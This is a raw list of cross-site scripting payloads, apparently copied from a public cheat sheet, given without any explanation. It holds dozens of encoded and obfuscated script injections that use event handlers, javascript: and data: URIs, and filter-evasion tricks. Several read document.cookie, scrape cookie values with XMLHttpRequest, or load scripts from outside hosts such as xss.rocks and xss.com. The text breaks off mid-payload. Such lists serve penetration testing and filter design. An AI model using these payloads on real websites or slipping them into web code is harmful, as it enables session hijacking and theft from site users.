'
<font style='color:expression(alert('XSS'))'>
' onmouseover=alert(/Black.Spook/) ' or 2=2 “ ” or 202 “;eval(unescape(location))//# %0Aalert(0) ”><BODY onload!#$%&()*~+-_.,:;?@^`=alert(“XSS”)> “><iframe%20src=”google.com“%%203E ”><img src=x onerror=prompt(1);> “><img src=x onerror=window.open('www.google.com/');> '%22–%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E %27%22–%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E %3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28%2b%29/%29%29}};xhr.send%28%29;%3C/script%3E alert(1) &<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> &ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &#39;&#88;&#83;&#83;&#39;&#41;> <IMG ”“”><SCRIPT>alert(“XSS”)</SCRIPT>“> <img src=x:x onerror=alert(1)> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40; <SCRIPT SRC=//xss.rocks/.j> '); alert('XSS ";alert('XSS');// <%<!–'%><script>alert(1);</script –> <%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)‘%22)); </%73%63%72%69%70%74> <–`<img/src=` onerror=alert(1)> –!> <~/XSS/-/STYLE=xss:e/**/xpression(alert('XSS'))> <<scr0ipt/src=xss.com/xss.js> <<SCRIPT>alert(”XSS“);//<</SCRIPT> <a href=”data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​“>Click Me</a> <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <a href=”data:text/html;base64_,<svg/onload=u0061le%72t(1)>“>X</a <a href=”javascript:u0061le%72t(1)“><button> <a href=”jAvAsCrIpT:alert(1)“>X</a> <a href=javascript:alert(document.cookie)>Click Here</a> <a onmouseover=”alert(document.cookie)“>xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a> <a target=”x“ href=”xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E <a target=“x” href=“xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> <a target=”x“ href=”xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <a target=“x” href=“xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> <BASE HREF=”javascript:alert('XSS');//“> <BODY onload!#$%&()*~+-_.,:;?@^`=alert(”XSS“)> <body onLoad=”alert('XSS');“ <body onunload=”javascript:alert('XSS');“> <body/onload=<!–>
alert(1)> <div style=”position:absolute;top:0;left:0;width:100%;height:100%“ onmouseover=”prompt(1)“ onclick=”alert(1)“>x</button>? <div onmouseover='alert(1)'>DIV</div> <div/onmouseover='alert(1)'> style=”x:“> <embed code=”businessinfo.co.uk/labs/xss/xss.swf“ allowscriptaccess=always>? <embed src=”corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf“> ? <form><button formaction=javascript:alert(1)>CLICKME <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <iframe src=”data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E“></iframe> <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> <iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script> <iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); <iframe src=%22404%22 onload=%22content.frames.document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','xssme.html5sec.org/xssme2’,false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>> <iframe src=%22404%22 onload=%22frames.document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','xssme.html5sec.org/xssme2’,false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>> <iframe src=%22404%22 onload=%22self.frames.document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','xssme.html5sec.org/xssme2’,false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>> <iframe src=%22404%22 onload=%22top.frames.document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','xssme.html5sec.org/xssme2’,false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22>> <iframe src=/ onload=eval(unescape(this.name.replace(//g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe> <iframe src=`xssme.html5sec.org/?xss=